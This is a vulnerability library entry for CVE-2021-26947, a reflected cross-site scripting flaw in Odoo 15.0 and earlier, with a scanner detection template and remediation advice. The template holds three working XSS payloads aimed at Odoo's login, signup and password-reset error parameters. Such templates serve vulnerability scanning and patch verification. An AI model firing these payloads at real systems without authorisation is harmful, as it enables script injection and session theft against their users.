/Vulnerability Library

Odoo <= 15.0 - Cross-Site Scripting

CVE-2021-26947
Early Release

Description

A cross-site scripting (XSS) vulnerability in Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier allows remote attackers to inject arbitrary web scripts into the browser of a victim via a crafted link. This issue could lead to the execution of malicious scripts in the context of the user's browser session.

Severity

Medium

CVSS Score

6.1

Exploit Probability

1%

Affected Product

odoo

Published Date

April 20, 2026

Template Author

ritikchaddha

CVE-2021-26947.yaml
id: CVE-2021-26947

info:
  name: Odoo <= 15.0 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    A cross-site scripting (XSS) vulnerability in Odoo Community 15.0 and earlier and Odoo Enterprise 15.0 and earlier allows remote attackers to inject arbitrary web scripts into the browser of a victim via a crafted link. This issue could lead to the execution of malicious scripts in the context of the user's browser session.
  impact: |
    Attackers can execute arbitrary scripts in victims' browsers, potentially stealing cookies, session tokens, or performing actions on behalf of the user.
  remediation: |
    Update to the latest version of Odoo where the vulnerability is fixed or apply security patches that sanitize user inputs properly.
  reference:
    - https://github.com/odoo/odoo/issues/107694
    - https://www.debian.org/security/2023/dsa-5399
    - https://nvd.nist.gov/vuln/detail/CVE-2021-26947
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-79
    cve-id: CVE-2021-26947
    epss-score: 0.0089
    epss-percentile: 0.75554
  metadata:
    max-request: 3
    verified: true
    vendor: odoo
    product: odoo
  tags: cve,cve2021,odoo,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/web/login?error=<script>alert(document.domain)</script>"
      - "{{BaseURL}}/web/signup?error=<img/src=x+onerror=alert(document.domain)>"
      - "{{BaseURL}}/web/reset_password?error=<svg/onload=alert(document.domain)>"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body, "<script>alert(document.domain)</script>", "<img/src=x onerror=alert(document.domain)>", "<svg/onload=alert(document.domain)>")'
          - 'contains_any(body, "content=\"Odoo", "var odoo", "Odoo</title>")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100d3c45eaca8c7bea9eac43ae6199ab8402a2ee7b956b494bec4b8b5e16b76a92c022100cb59759cd9c26434a7231b0f2a2594e60240adc4ef520285a195e01c95db41ad:922c64590222798bb761d5b6d8e72950
6.1Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID:
cve-2021-26947
CWE ID:
cwe-79

References

https://github.com/odoo/odoo/issues/107694https://www.debian.org/security/2023/dsa-5399https://nvd.nist.gov/vuln/detail/CVE-2021-26947

Remediation Steps

Update to the latest version of Odoo where the vulnerability is fixed or apply security patches that sanitize user inputs properly.